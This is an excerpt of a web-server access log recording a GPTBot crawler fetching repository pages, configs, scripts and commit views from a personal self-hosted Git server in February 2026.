"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12506] [Gzip 7.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12794] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12501] [Gzip 7.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12767] [Gzip 7.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" -[17/Feb/2026:15:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12763] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" -[17/Feb/2026:15:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14255] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:15:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" -[17/Feb/2026:15:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10301] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10169] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10300] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" -[17/Feb/2026:15:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" -[17/Feb/2026:15:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12468] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12436] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 27678] [Gzip 6.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:31:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:15:31:41 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:15:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2findex.html" [Client 74.7.227.38] [Length 23949] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:15:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2findex.html" [Client 74.7.227.38] [Length 61215] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:15:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2findex.html" [Client 74.7.227.38] [Length 41205] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:15:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24075] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" -[17/Feb/2026:15:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24072] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" -[17/Feb/2026:15:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8486] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:15:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8491] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:15:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12755] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13624] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" -[17/Feb/2026:15:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 1981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:31:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/keys.json" -[17/Feb/2026:15:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/keys.json" -[17/Feb/2026:15:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md?display=source" [Client 74.7.227.38] [Length 11761] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" -[17/Feb/2026:15:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:15:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8501] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:15:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj?display=source" [Client 74.7.227.38] [Length 11547] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:15:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" -[17/Feb/2026:15:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 14942] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" -[17/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=repositories" [Client 74.7.227.38] [Length 8153] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:15:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12483] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 16437] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdist%2fAssetPilot.exe" [Client 74.7.227.38] [Length 20801] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:15:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fmy_database.db" [Client 74.7.227.38] [Length 24116] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" -[17/Feb/2026:15:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:15:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fwatchdog.py.old" [Client 74.7.227.38] [Length 24329] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:15:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr 